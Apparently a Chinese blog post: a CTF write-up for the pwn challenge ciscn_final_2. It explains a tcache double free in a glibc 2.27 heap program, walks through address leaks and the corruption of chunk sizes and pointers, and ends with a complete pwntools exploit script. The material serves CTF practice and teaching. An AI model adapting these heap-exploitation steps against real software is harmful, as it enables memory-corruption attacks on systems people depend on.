我的技术与生活——ciscn_final_2

例行检查，保护全开，就不放了。

add函数，只能申请0x20大小的堆或者0x10大小的，只能先申请再释放

存在double free漏洞

可以double free泄露出堆地址，但是是int类型，接收的话用addr=int(p.recvuntil(‘\n’, drop=True)),发送的时候用str类型就可在内存里用十六进制存储了。

前戏是先double free改堆头的size，改size容易但是中间得add好几个堆

add(1,'11')
dele(1)
add(2,'22')
add(2,'11')
add(2,'11')
add(2,'22')
dele(2)
add(1,'11')
dele(2)
show(2)
p.recvuntil('your short type inode number :')
addr=int(p.recvuntil('\n', drop=True))-0xa0

add(2,addr)
add(2,'11')
add(2,0x91) #改掉size

free7次使其进入unsortedbin,前面改size成0x90是最小的大小，不然下面的地址不会是main_arena+96

for i in range(7):
    dele(1)
    add(2,5)

dele(1)

接收并计算地址,至于为什么是 IO_2_1_stdin +0x70，应该是它执行时候的地址。

show(1)
p.recvuntil('your int type inode number :')
malloc_hook=int(p.recvuntil('\n', drop=True))-0x70
base=malloc_hook-libc.sym['__malloc_hook']
stdin=base+libc.sym['_IO_2_1_stdin_']+0x70

再次malloc改掉堆地址,然后填充

1 2	add(1,stdin) add(1,0x30)

再次double free获取头地址，再次show出来的堆头地址和开始时的时不一样的。

dele(1)
add(2,0x30)
dele(1) #double free

show(1)
p.recvuntil('your int type inode number :')
chunk0=int(p.recvuntil('\n', drop=True))-0x30

再改堆指针,填充

add(1,chunk0)
add(1,chunk0)
add(1,111)
add(1,666)

exp

from pwn import *
from LibcSearcher import *
p=process('./ciscn_final_2')
#p=remote('node4.buuoj.cn',26681)
context( os = 'linux',arch='amd64')
context.log_level = 'debug'
elf=ELF('./ciscn_final_2')
libc=ELF('./libc-2.27.so')
def add(index,content):
    p.sendlineafter('> ','1')
    p.sendlineafter('>',str(index))
    p.sendlineafter('your inode number:',str(content))

def dele(index):
    p.sendlineafter('> ','2')
    p.sendlineafter('>',str(index))

def show(index):
    p.sendlineafter('> ','3')
    p.sendlineafter('>',str(index))

add(1,'11')
dele(1)
add(2,'22')
add(2,'11')
add(2,'11')
add(2,'22')
dele(2)
add(1,'11')
dele(2)
show(2)
p.recvuntil('your short type inode number :')
addr=int(p.recvuntil('\n', drop=True))-0xa0

add(2,addr)
add(2,'11')
add(2,0x91)

for i in range(7):
    dele(1)
    add(2,5)

dele(1)

show(1)
p.recvuntil('your int type inode number :')
malloc_hook=int(p.recvuntil('\n', drop=True))-0x70
base=malloc_hook-libc.sym['__malloc_hook']
stdin=base+libc.sym['_IO_2_1_stdin_']+0x70

add(1,stdin)  ###???
add(1,0x30)

#double free

dele(1)
add(2,0x30)
dele(1)


show(1)
p.recvuntil('your int type inode number :')
chunk0=int(p.recvuntil('\n', drop=True))-0x30
add(1,chunk0)
gdb.attach(p)
sleep(1)
add(1,chunk0)
add(1,111)
add(1,666)

p.sendlineafter('> ','4')
p.recvuntil('your message :')

#print(addr)
p.interactive()

站点信息

ciscn_final_2

例行检查，保护全开，就不放了。

add函数，只能申请0x20大小的堆或者0x10大小的，只能先申请再释放

存在double free漏洞

可以double free泄露出堆地址，但是是int类型，接收的话用addr=int(p.recvuntil(‘\n’, drop=True)),发送的时候用str类型就可在内存里用十六进制存储了。

前戏是先double free改堆头的size，改size容易但是中间得add好几个堆

free7次使其进入unsortedbin,前面改size成0x90是最小的大小，不然下面的地址不会是main_arena+96

接收并计算地址,至于为什么是 IO_2_1_stdin +0x70，应该是它执行时候的地址。

再次malloc改掉堆地址,然后填充

再次double free获取头地址，再次show出来的堆头地址和开始时的时不一样的。

再改堆指针,填充

exp

评论区

目录

公告栏